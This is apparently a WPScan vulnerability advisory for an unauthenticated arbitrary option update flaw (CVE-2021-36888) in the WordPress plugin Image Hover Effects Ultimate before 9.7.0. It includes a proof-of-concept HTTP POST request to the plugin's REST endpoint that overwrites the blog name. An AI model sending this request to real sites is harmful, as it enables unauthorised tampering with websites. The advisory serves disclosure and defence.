Lucene search
WpvulndbWPVDB-ID:75DA4102-7063-407F-975E-28BE6ED33AACHistoryDec 15, 2021 - 12:00 a.m.
Image Hover Effects Ultimate < 9.7.0 - Unauthenticated Arbitrary Option Update
2021-12-1500:00:00
wpscan.com
8
image hover effects
unauthenticated
arbitrary update
rest api
attackers
blog options
EPSS
0.002
Percentile
65.1%
The plugin does not have any authorisation in its REST API endpoint, one of them could allow unauthenticated attackers to update arbitrary blog options. The original report mentioned the issue being fixed in 9.6.2, however it was still possible for attackers to exploit it and proper remediation has been done in 9.7.0
PoC
POST /wp-json/ImageHoverUltimate/v1/oxi_settings HTTP/1.1 Accept: / Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 69 Connection: close rawdata=%7B%22name%22%3A%22blogname%22%2C%22value%22%3A%22Owned%22%7D
Related
cve
cve
CVE-2021-36888
2021-12-15 19:15:14
nvd
nvd
CVE-2021-36888
2021-12-15 19:15:14
cvelist
cvelist
patchstack
patchstack
prion
prion
Code injection
2021-12-15 19:15:00
cnvd
cnvd
WordPress Image Hover Effects Ultimate has an unspecified vulnerability
2021-12-17 00:00:00
wpexploit
wpexploit